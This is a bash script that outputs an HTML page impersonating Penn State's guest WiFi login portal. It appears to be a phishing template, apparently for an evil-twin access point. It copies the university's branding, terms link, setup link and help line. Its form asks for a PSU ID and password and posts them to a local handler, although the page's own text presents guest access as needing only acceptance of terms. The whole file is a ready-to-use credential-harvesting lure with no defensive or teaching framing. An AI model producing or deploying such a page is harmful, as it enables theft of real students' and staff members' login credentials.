#!/usr/bin/env bash

echo '<!DOCTYPE html>'
echo '<html lang="en">'
echo -e '\t<head>'
echo -e '\t\t<meta charset="utf-8" />'
echo -e '\t\t<meta name="viewport" content="width=device-width, initial-scale=1.0">'
echo -e '\t\t<title>Penn State | Login to psu-guest WiFi | Login</title>'
echo -e '\t\t<style>'
echo -e '\t\t\tbody {'
echo -e '\t\t\t\tbackground-color: #1A3C84;'
echo -e '\t\t\t\tcolor: white;'
echo -e '\t\t\t\tfont-family: "Open Sans", sans-serif;'
echo -e '\t\t\t\ttext-align: center;'
echo -e '\t\t\t\tmargin: 0;'
echo -e '\t\t\t\tpadding: 20px;'
echo -e '\t\t\t}'
echo -e '\t\t\t.box {'
echo -e '\t\t\t\tmax-width: 800px;'
echo -e '\t\t\t\tmargin: 0 auto;'
echo -e '\t\t\t\tpadding: 20px;'
echo -e '\t\t\t}'
echo -e '\t\t\t.logo-container {'
echo -e '\t\t\t\tbackground-color: rgba(200, 200, 200, 0.2);'
echo -e '\t\t\t\tborder-radius: 15px;'
echo -e '\t\t\t\tpadding: 20px;'
echo -e '\t\t\t\tdisplay: inline-block;'
echo -e '\t\t\t\tmargin-bottom: 30px;'
echo -e '\t\t\t}'
echo -e '\t\t\t.nwaForm {'
echo -e '\t\t\t\tmargin: 30px 0;'
echo -e '\t\t\t}'
echo -e '\t\t\t.nwaForm input[type="password"],'
echo -e '\t\t\t.nwaForm input[type="text"] {'
echo -e '\t\t\t\tpadding: 10px;'
echo -e '\t\t\t\tmargin: 10px 0;'
echo -e '\t\t\t\twidth: 250px;'
echo -e '\t\t\t\tfont-size: 16px;'
echo -e '\t\t\t}'
echo -e '\t\t\t.form-group {'
echo -e '\t\t\t\tmargin-bottom: 20px;'
echo -e '\t\t\t}'
echo -e '\t\t\tinput[type="submit"] {'
echo -e '\t\t\t\tpadding: 10px 20px;'
echo -e '\t\t\t\tmargin: 15px 0;'
echo -e '\t\t\t\tfont-size: 18px;'
echo -e '\t\t\t\tfont-weight: 600;'
echo -e '\t\t\t\tcolor: white;'
echo -e '\t\t\t\tbackground-color: #2d5ab9;'
echo -e '\t\t\t\tborder: none;'
echo -e '\t\t\t\tborder-radius: 5px;'
echo -e '\t\t\t\tcursor: pointer;'
echo -e '\t\t\t\twidth: 300px;'
echo -e '\t\t\t}'
echo -e '\t\t\tinput[type="submit"]:hover {'
echo -e '\t\t\t\tbackground-color: #1e3c7d;'
echo -e '\t\t\t}'
echo -e '\t\t\ta {'
echo -e '\t\t\t\tcolor: #66ffff;'
echo -e '\t\t\t}'
echo -e '\t\t</style>'
echo -e '\t\t<script type="text/javascript" src="portal.js"></script>'
echo -e '\t</head>'
echo -e '\t<body class="metro large nonav">'
echo -e '\t\t<div id="root">'
echo -e '\t\t\t<div class="box" id="box1" role="banner">'
echo -e '\t\t\t\t<h1>'
echo -e '\t\t\t\t\t<div class="logo-container">'
echo -e '\t\t\t\t\t\t<div id="box3">'
echo -e '\t\t\t\t\t\t\t<img src="psulogoforincommon-456x150.png" alt="Penn State Logo" style="max-width: 456px; width: 75%;">'
echo -e '\t\t\t\t\t\t</div>'
echo -e '\t\t\t\t\t</div>'
echo -e '\t\t\t\t</h1>'
echo -e '\t\t\t</div>'
echo -e '\t\t\t<div class="box" id="box2" role="main">'
echo -e '\t\t\t\t<div id="content-marker">'
echo -e '\t\t\t\t\t<div style="font-size: 25px; margin-bottom: 20px;">Welcome to Penn State!</div>'
echo -e '\t\t\t\t\t<div style="font-size: 16px; line-height: 1.6; margin-bottom: 20px;">'
echo -e '\t\t\t\t\t\tPenn State provides free wireless access for visitors and guests. By clicking the Accept and Connect button below, you acknowledge your acceptance of the <a href="/guest/public/psu-guest/terms.html">Terms of Use</a> for Penn State'"'"'s guest wireless network.'
echo -e '\t\t\t\t\t</div>'
echo -e '\t\t\t\t\t<div class="nwaForm">'
echo -e '\t\t\t\t\t\t<form method="post" id="loginform" name="loginform" action="check.htm">'
echo -e '\t\t\t\t\t\t\t<div class="form-group">'
echo -e '\t\t\t\t\t\t\t\t<label for="psu-id">PSU ID:</label>'
echo -e '\t\t\t\t\t\t\t\t<input type="text" id="psu-id" name="psuId" placeholder="Enter your PSU ID" required>'
echo -e '\t\t\t\t\t\t\t</div>'
echo -e '\t\t\t\t\t\t\t<div class="form-group">'
echo -e '\t\t\t\t\t\t\t\t<label for="password">Password:</label>'
echo -e '\t\t\t\t\t\t\t\t<input type="password" id="password" name="password" placeholder="Enter password" required>'
echo -e '\t\t\t\t\t\t\t</div>'
echo -e '\t\t\t\t\t\t\t<input type="submit" value="Accept and Connect">'
echo -e '\t\t\t\t\t\t</form>'
echo -e '\t\t\t\t\t</div>'
echo -e '\t\t\t\t\t<div style="font-size: 16px; line-height: 1.6; margin: 20px 0;">'
echo -e '\t\t\t\t\t\tIf you have a Penn State access account, please click the button below to set up Penn State'"'"'s wireless network on your device.'
echo -e '\t\t\t\t\t</div>'
echo -e '\t\t\t\t\t<input type="submit" onclick="location.href='"'"'https://wireless.psu.edu'"'"';" value="Setup Penn State Wireless">'
echo -e '\t\t\t\t\t<div style="font-size: 16px; line-height: 1.6; margin-top: 30px;">'
echo -e '\t\t\t\t\t\tFor Assistance please call 814-865-4357 (HELP)'
echo -e '\t\t\t\t\t</div>'
echo -e '\t\t\t\t\t<div style="font-size: 12px; margin-top: 20px;">'
echo -e '\t\t\t\t\t\t© Copyright 2025 The Pennsylvania State University'
echo -e '\t\t\t\t\t</div>'
echo -e '\t\t\t\t</div>'
echo -e '\t\t\t</div>'
echo -e '\t\t</div>'
echo -e '\t</body>'
echo '</html>'
exit 0
